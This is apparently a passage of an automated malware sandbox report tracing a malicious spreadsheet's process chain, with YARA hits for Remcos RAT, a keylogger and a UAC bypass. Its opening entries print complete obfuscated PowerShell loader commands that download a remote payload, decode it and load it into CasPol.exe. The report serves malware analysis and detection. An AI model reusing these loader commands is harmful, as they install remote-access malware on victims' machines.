                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                                Imagebase:0x13f8a0000
                                                                                                                                                                                File size:443'392 bytes
                                                                                                                                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:27
                                                                                                                                                                                Start time:08:07:12
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
                                                                                                                                                                                Imagebase:0x13f8a0000
                                                                                                                                                                                File size:443'392 bytes
                                                                                                                                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:28
                                                                                                                                                                                Start time:08:07:21
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                                                Imagebase:0x1200000
                                                                                                                                                                                File size:107'704 bytes
                                                                                                                                                                                MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:30
                                                                                                                                                                                Start time:08:07:29
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\celvhtcxiwczckrdjzxnvyxm"
                                                                                                                                                                                Imagebase:0x1200000
                                                                                                                                                                                File size:107'704 bytes
                                                                                                                                                                                MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:31
                                                                                                                                                                                Start time:08:07:29
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\eyqfiluzweuemqnhakkgfkrdatg"
                                                                                                                                                                                Imagebase:0x1200000
                                                                                                                                                                                File size:107'704 bytes
                                                                                                                                                                                MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:32
                                                                                                                                                                                Start time:08:07:30
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oavyjefskmmjowblkvxiixmujzxyrr"
                                                                                                                                                                                Imagebase:0x1200000
                                                                                                                                                                                File size:107'704 bytes
                                                                                                                                                                                MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:33
                                                                                                                                                                                Start time:08:07:31
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oavyjefskmmjowblkvxiixmujzxyrr"
                                                                                                                                                                                Imagebase:0x1200000
                                                                                                                                                                                File size:107'704 bytes
                                                                                                                                                                                MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:35
                                                                                                                                                                                Start time:08:07:36
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                                                Imagebase:0x1200000
                                                                                                                                                                                File size:107'704 bytes
                                                                                                                                                                                MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000023.00000002.543234045.0000000000505000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Disassembly

                                                                                                                                                                                Code Analysis

                                                                                                                                                                                Call Graph

                                                                                                                                                                                • Entrypoint
                                                                                                                                                                                • Decryption Function
                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                • Show Help
                                                                                                                                                                                callgraph 1 Error: Graph is empty

                                                                                                                                                                                Module: Sheet1

                                                                                                                                                                                Declaration
                                                                                                                                                                                LineContent
                                                                                                                                                                                1

                                                                                                                                                                                Attribute VB_Name = "Sheet1"

                                                                                                                                                                                2

                                                                                                                                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                                3

                                                                                                                                                                                Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                4

                                                                                                                                                                                Attribute VB_Creatable = False

                                                                                                                                                                                5

                                                                                                                                                                                Attribute VB_PredeclaredId = True

                                                                                                                                                                                6

                                                                                                                                                                                Attribute VB_Exposed = True

                                                                                                                                                                                7

                                                                                                                                                                                Attribute VB_TemplateDerived = False

                                                                                                                                                                                8

                                                                                                                                                                                Attribute VB_Customizable = True

                                                                                                                                                                                Module: Sheet2

                                                                                                                                                                                Declaration
                                                                                                                                                                                LineContent
                                                                                                                                                                                1

                                                                                                                                                                                Attribute VB_Name = "Sheet2"

                                                                                                                                                                                2

                                                                                                                                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                                3

                                                                                                                                                                                Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                4

                                                                                                                                                                                Attribute VB_Creatable = False

                                                                                                                                                                                5

                                                                                                                                                                                Attribute VB_PredeclaredId = True

                                                                                                                                                                                6

                                                                                                                                                                                Attribute VB_Exposed = True

                                                                                                                                                                                7

                                                                                                                                                                                Attribute VB_TemplateDerived = False

                                                                                                                                                                                8

                                                                                                                                                                                Attribute VB_Customizable = True

                                                                                                                                                                                Module: Sheet3

                                                                                                                                                                                Declaration
                                                                                                                                                                                LineContent
                                                                                                                                                                                1

                                                                                                                                                                                Attribute VB_Name = "Sheet3"

                                                                                                                                                                                2

                                                                                                                                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                                3

                                                                                                                                                                                Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                4

                                                                                                                                                                                Attribute VB_Creatable = False

                                                                                                                                                                                5

                                                                                                                                                                                Attribute VB_PredeclaredId = True

                                                                                                                                                                                6

                                                                                                                                                                                Attribute VB_Exposed = True

                                                                                                                                                                                7

                                                                                                                                                                                Attribute VB_TemplateDerived = False

                                                                                                                                                                                8

                                                                                                                                                                                Attribute VB_Customizable = True

                                                                                                                                                                                Module: ThisWorkbook

                                                                                                                                                                                Declaration
                                                                                                                                                                                LineContent
                                                                                                                                                                                1

                                                                                                                                                                                Attribute VB_Name = "ThisWorkbook"

                                                                                                                                                                                2

                                                                                                                                                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                                                                                3

                                                                                                                                                                                Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                4

                                                                                                                                                                                Attribute VB_Creatable = False

                                                                                                                                                                                5

                                                                                                                                                                                Attribute VB_PredeclaredId = True

                                                                                                                                                                                6

                                                                                                                                                                                Attribute VB_Exposed = True

                                                                                                                                                                                7

                                                                                                                                                                                Attribute VB_TemplateDerived = False

                                                                                                                                                                                8

                                                                                                                                                                                Attribute VB_Customizable = True

                                                                                                                                                                                Reset < >

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 035C0FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000003.426554194.00000000035C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_3_35c0000_mshta.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                  • Instruction ID: 45e170f83687252b727edd45f3b39d431e6b69e8d7fe941d490773f679e3d818
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                  Function 035C0FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000004.00000003.426554194.00000000035C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_3_35c0000_mshta.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                  • Instruction ID: 45e170f83687252b727edd45f3b39d431e6b69e8d7fe941d490773f679e3d818
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                  • Instruction Fuzzy Hash:

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:4.7%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                  Signature Coverage:50%
                                                                                                                                                                                  Total number of Nodes:6
                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                  execution_graph 2473 7fe899c4b18 2474 7fe899c5a40 URLDownloadToFileW 2473->2474 2476 7fe899c5b10 2474->2476 2469 7fe899c59f1 2471 7fe899c5a01 URLDownloadToFileW 2469->2471 2472 7fe899c5b10 2471->2472

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 000007FE899C4B18 Relevance: 1.6, APIs: 1, Instructions: 129filenetworkCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.455884233.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7fe899c0000_powershell.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DownloadFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1407266417-0
                                                                                                                                                                                  • Opcode ID: f9bb48566b8a8713db188f66dd08dba335d72fc7a8ea6332beab3c7c899ed28d
                                                                                                                                                                                  • Instruction ID: 0fd39b7818fca3ca73efb3d9c9ca275204db205e70f59f2811741eb3bba922f4
                                                                                                                                                                                  • Opcode Fuzzy Hash: f9bb48566b8a8713db188f66dd08dba335d72fc7a8ea6332beab3c7c899ed28d
                                                                                                                                                                                  • Instruction Fuzzy Hash: CB31703191CA5C8FDB58DF5C98857A9BBE1FB69715F00822ED04ED3661CB70A8458B81
                                                                                                                                                                                  Function 000007FE899C59F1 Relevance: 1.7, APIs: 1, Instructions: 159filenetworkCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.455884233.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7fe899c0000_powershell.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DownloadFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1407266417-0
                                                                                                                                                                                  • Opcode ID: 4eb14410ff6a37505ca03640c505f2fe2ae47be4f04cb48e65c452d7a4318378
                                                                                                                                                                                  • Instruction ID: c70b8806b6cbf1da65165165ae70fb2f57ea280841a98dc75a3b89f6dcafc163
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4eb14410ff6a37505ca03640c505f2fe2ae47be4f04cb48e65c452d7a4318378
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7241E43191CB889FDB19DB589C447EABBF4FB66325F04826FD08DD3162CB246846C782
                                                                                                                                                                                  Function 000007FE89A92649 Relevance: .7, Instructions: 702COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 26 7fe89a92649-7fe89a926f9 27 7fe89a92bdd-7fe89a92c96 26->27 28 7fe89a926ff-7fe89a92709 26->28 29 7fe89a9270b-7fe89a92718 28->29 30 7fe89a92722-7fe89a92729 28->30 29->30 31 7fe89a9271a-7fe89a92720 29->31 32 7fe89a9272b-7fe89a9273e 30->32 33 7fe89a92740 30->33 31->30 35 7fe89a92742-7fe89a92744 32->35 33->35 38 7fe89a92b58-7fe89a92b62 35->38 39 7fe89a9274a-7fe89a92756 35->39 40 7fe89a92b64-7fe89a92b74 38->40 41 7fe89a92b75-7fe89a92b85 38->41 39->27 42 7fe89a9275c-7fe89a92766 39->42 44 7fe89a92b87-7fe89a92b8b 41->44 45 7fe89a92b92-7fe89a92bdc 41->45 46 7fe89a92768-7fe89a92775 42->46 47 7fe89a92782-7fe89a92792 42->47 44->45 46->47 48 7fe89a92777-7fe89a92780 46->48 47->38 52 7fe89a92798-7fe89a927cc 47->52 48->47 52->38 58 7fe89a927d2-7fe89a927de 52->58 58->27 59 7fe89a927e4-7fe89a927ee 58->59 60 7fe89a92807-7fe89a9280c 59->60 61 7fe89a927f0-7fe89a927fd 59->61 60->38 63 7fe89a92812-7fe89a92817 60->63 61->60 62 7fe89a927ff-7fe89a92805 61->62 62->60 63->38 64 7fe89a9281d-7fe89a92822 63->64 64->38 66 7fe89a92828-7fe89a92837 64->66 67 7fe89a92839-7fe89a92843 66->67 68 7fe89a92847 66->68 69 7fe89a92845 67->69 70 7fe89a92863-7fe89a928ee 67->70 71 7fe89a9284c-7fe89a92859 68->71 69->71 78 7fe89a928f0-7fe89a928fb 70->78 79 7fe89a92902-7fe89a92924 70->79 71->70 72 7fe89a9285b-7fe89a92861 71->72 72->70 78->79 80 7fe89a92926-7fe89a92930 79->80 81 7fe89a92934 79->81 82 7fe89a92950-7fe89a929de 80->82 83 7fe89a92932 80->83 84 7fe89a92939-7fe89a92946 81->84 91 7fe89a929e0-7fe89a929eb 82->91 92 7fe89a929f2-7fe89a92a10 82->92 83->84 84->82 85 7fe89a92948-7fe89a9294e 84->85 85->82 91->92 93 7fe89a92a20 92->93 94 7fe89a92a12-7fe89a92a1c 92->94 97 7fe89a92a25-7fe89a92a33 93->97 95 7fe89a92a3d-7fe89a92acd 94->95 96 7fe89a92a1e 94->96 104 7fe89a92ae1-7fe89a92b3a 95->104 105 7fe89a92acf-7fe89a92ada 95->105 96->97 97->95 99 7fe89a92a35-7fe89a92a3b 97->99 99->95 108 7fe89a92b42-7fe89a92b57 104->108 105->104
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.456050358.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7fe89a90000_powershell.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 50e46cb7a64d88ae55e0acf1998f055cf9f38bbb5dd64610feefa5db64873083
                                                                                                                                                                                  • Instruction ID: f6e8872ed1469d081c51230cdc1cc5e787fe14880d5c117e05c8e422a8bf4e0a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 50e46cb7a64d88ae55e0acf1998f055cf9f38bbb5dd64610feefa5db64873083
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4822E43090CB894FE759EB2C8454669BFE2FF9A344F2401EED48EC72A3DA25AC55C741
                                                                                                                                                                                  Function 000007FE89A90F3F Relevance: .3, Instructions: 335COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 109 7fe89a90f3f-7fe89a90f96 110 7fe89a91098-7fe89a9109e 109->110 111 7fe89a90f9c-7fe89a90fa6 109->111 116 7fe89a9109f-7fe89a910d0 110->116 112 7fe89a90fa8-7fe89a90fb5 111->112 113 7fe89a90fbf-7fe89a90fee 111->113 112->113 115 7fe89a90fb7-7fe89a90fbd 112->115 113->110 122 7fe89a90ff4-7fe89a90ffe 113->122 115->113 121 7fe89a910d2-7fe89a910dc 116->121 123 7fe89a910ed-7fe89a91124 121->123 124 7fe89a910de-7fe89a910e9 121->124 125 7fe89a91017-7fe89a91077 122->125 126 7fe89a91000-7fe89a9100d 122->126 127 7fe89a9112a-7fe89a9119e 123->127 128 7fe89a911c1-7fe89a911cb 123->128 124->123 140 7fe89a91079-7fe89a91084 125->140 141 7fe89a9108b-7fe89a91097 125->141 126->125 129 7fe89a9100f-7fe89a91015 126->129 144 7fe89a911a6-7fe89a911be 127->144 130 7fe89a911d8-7fe89a911e8 128->130 131 7fe89a911cd-7fe89a911d7 128->131 129->125 132 7fe89a911ea-7fe89a911ee 130->132 133 7fe89a911f5-7fe89a9121a 130->133 132->133 140->141 144->128
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.456050358.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7fe89a90000_powershell.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b7734741fe9a3fbdd104ba0bc8ccd96d09d76e0af5fb23faa1e3391216507344
                                                                                                                                                                                  • Instruction ID: 0bce622fe825800b91f382164a61ec368495551494493162141753348ce1a23b
                                                                                                                                                                                  • Opcode Fuzzy Hash: b7734741fe9a3fbdd104ba0bc8ccd96d09d76e0af5fb23faa1e3391216507344
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EA1E321A0EBC90FE347973C58642657FE1EF57254B2A01EBC48DCB2B3D9199C5AC362

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 03860FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000010.00000003.470628741.0000000003860000.00000010.00000800.00020000.00000000.sdmp, Offset: 03860000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_16_3_3860000_mshta.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
